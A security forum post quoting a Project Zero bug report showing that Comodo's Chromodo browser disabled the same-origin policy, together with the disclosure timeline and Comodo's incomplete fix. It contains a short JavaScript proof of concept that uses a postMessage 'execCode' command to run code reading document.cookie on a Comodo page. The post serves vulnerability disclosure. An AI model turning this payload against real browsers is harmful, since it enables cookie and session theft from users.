Comodo Dragon Completely Disables All Browser Security

Discussion in 'other software & services' started by AutoCascade, Feb 2, 2016.

  1. AutoCascade

    AutoCascade Registered Member

    Joined:
    Feb 16, 2014
    Posts:
    626
    Location:
    United States
    From WidlbyDesign

    https://www.wilderssecurity.com/thre...ore-release-cicles.382607/page-3#post-2561395

    Note that this was marked closed because Comodo said they fixed it but it wasn't really fixed so a new issue #713 was opened. I can't get to that issue though if someone else can post it here. There are also other open issues mentioned for C Dragon.

    Tavis Ormandy ‏@taviso 3h3 hours ago
    Selling antivirus doesn't qualify you to fork chromium, you're going to screw it up.

    https://code.google.com/p/google-security-research/issues/detail?id=704

    When you install Comodo Internet Security, by default a new browser called Chromodo is installed and set as the default browser. Additionally, all shortcuts are replaced with Chromodo links and all settings, cookies, etc are imported from Chrome. They also hijack DNS settings, among other shady practices.

    https://www.comodo.com/home/browsers-toolbars/chromodo-private-internet-browser.php

    Chromodo is described as "highest levels of speed, security and privacy", but actually disables all web security. Let me repeat that, they ***disable the same origin policy***.... ?!?..

    To reproduce, do something like this:


    <html>
    <head></head>
    <body>
    <script>
    function steal_cookie(obj)
    {
    // Wait for the page to load
    setTimeout(function() {
    obj.postMessage(JSON.stringify({
    command: "execCode",
    code: "alert(document.cookie)",
    }), "*");
    }, 2000);
    }
    </script>
    <a href="javascript:steal_cookie(window.open('https://ssl.comodo.com/'))">Click Here</a>
    </body>
    </html>
    This bug is subject to a 90 day disclosure deadline. If 90 days elapse
    without a broadly available patch, then the bug report will automatically
    become visible to the public.

    Windows 7 x86-2016-01-21-16-48-44.png
    258 KB View Download

    Jan 25, 2016 Project Member #1 tav...@google.com
    I've attached a working exploit for this issue. I haven't received an acknowledgement or response from Comodo, so I sent this reply:

    FYI, I still haven't got a response. The same origin policy is basically disabled for all of your customers, which means there is no security on the web....this is about as bad as it gets. If the impact isn't clear to you, please let me know.

    This vulnerability is bad enough to start paging people.

    https://ssl.gstatic.com/codesite/ph/images/paperclip.gif exploit.html
    1.3 KB View Download
    Jan 29 (4 days ago)
    Project Member #2 tav...@google.com
    Comodo replied that they're planning a hotfix for this issue within a day, but the other open issues may take weeks to fix.

    I replied that I noticed their scan process is not using ASLR, which probably isn't a good sign going forward, and I'm planning to start a more thorough audit next week.

    Today (2 hours ago)
    Project Member #5 tav...@google.com
    It looks like Comodo pushed a change that removes the "execCode" API that I was using in my exploit.

    This is obviously an incorrect fix, and a trivial change makes the vulnerability still exploitable. After "discussion" with Comodo (I can't really get any response from them, but I'm trying), I'll consider this bug fixed and file a new bug with the trivial bypass of their fix as a new issue.

    The deleted comments above contained discussion about the bypass, I'll move them into a new issue.

    Project Member #6 tav...@google.com
    Discussion about the incorrect fix is in issue 713.
    Today (2 hours ago) Project Member #7 tav...@google.com
    (No comment was entered for this change.)
    Blocking: google-security-research:713
    Today (2 hours ago) #8 kobrasre...@gmail.com
    "After "discussion" with Comodo (I can't really get any response from them, but I'm trying)"

    Hopefully this being posted on HackerNews will help. If not, rampant exploitation of Comodo browsers ought to incentivize companies to cancel their subscriptions and Comodo will lose money.
    Today (62 minutes ago) #9 l33t...@gmail.com
    toppest of keks, my friend.

    There's plenty of evidence of the shadiness of Chromodo, it gets pushed via the kind of PUP bundler networks that also push winlocker trojans of Indian origin.
    Today (59 minutes ago)
     
    Last edited: Feb 2, 2016
Loading...